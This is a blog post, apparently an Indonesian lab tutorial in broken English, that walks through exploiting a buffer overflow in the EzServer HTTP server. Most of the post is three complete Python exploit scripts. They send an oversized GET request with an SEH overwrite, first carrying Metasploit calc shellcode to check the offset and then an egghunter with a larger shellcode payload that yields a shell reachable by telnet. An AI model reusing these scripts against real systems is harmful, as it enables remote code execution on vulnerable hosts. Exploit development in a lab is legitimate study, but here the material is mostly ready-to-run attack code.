Rabu, 03 Oktober 2012

EzServer PART II

in the last posting, im not into system C, because there problem on the calculation stack. . ok we repetead disscuss

 1. see, we not finish in statement "telnet", this is solution
edit our file fuzzing "fuzzereasy.py", become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+="\x90" * (5954-len(buffer))
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()

and you do fuzzing "fuzzerserver.py"

2. calculation to determine its true or not, we use the "calc"
open browser and type "127.0.0.1:55555" choose payload-windows execute command, and fill it in dialog box..as picture below

and do click generate payload, and this result


and then -- edit ou file fuzzer , become..

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+="\x90" * (5954-len(buffer))
buffer+=("\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb5"
"\xde\x82\x48\x83\xeb\xfc\xe2\xf4\x49\x36\xc6\x48\xb5\xde\x09\x0d"
"\x89\x55\xfe\x4d\xcd\xdf\x6d\xc3\xfa\xc6\x09\x17\x95\xdf\x69\x01"
"\x3e\xea\x09\x49\x5b\xef\x42\xd1\x19\x5a\x42\x3c\xb2\x1f\x48\x45"
"\xb4\x1c\x69\xbc\x8e\x8a\xa6\x4c\xc0\x3b\x09\x17\x91\xdf\x69\x2e"
"\x3e\xd2\xc9\xc3\xea\xc2\x83\xa3\x3e\xc2\x09\x49\x5e\x57\xde\x6c"
"\xb1\x1d\xb3\x88\xd1\x55\xc2\x78\x30\x1e\xfa\x44\x3e\x9e\x8e\xc3"
"\xc5\xc2\x2f\xc3\xdd\xd6\x69\x41\x3e\x5e\x32\x48\xb5\xde\x09\x20"
"\x89\x81\xb3\xbe\xd5\x88\x0b\xb0\x36\x1e\xf9\x18\xdd\x2e\x08\x4c"
"\xea\xb6\x1a\xb6\x3f\xd0\xd5\xb7\x52\xbd\xe3\x24\xd6\xde\x82\x48")
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()











running Ezserver without you running ollydbg, and make fuzzing,

appear  running EZserver before fuzzing
and appear after fuzzing


if appear calculator then value offset is true

3. at the last, make egghunter, edit for file fuzzer ..
put payload from metasploit framework, and then your copy result payload in the file fuzzing become -->>

 #!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
#buffer="\x90" * 5879
buffer="\x90" * 5457


hunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")


payload = ("\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")



buffer+= "w00tw00t"
buffer+= payload
buffer+= "\x90" * 70
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x96\x96\x20\x10"
buffer+= "\x90" * 16
buffer+= hunt
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()





running Ezserver
and this resullt 
do fuzzing with terminal
 type "telnet "ip_target" "port_target" "
from above picture seen that we've managed to do explotation
Alhamdullilah







Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)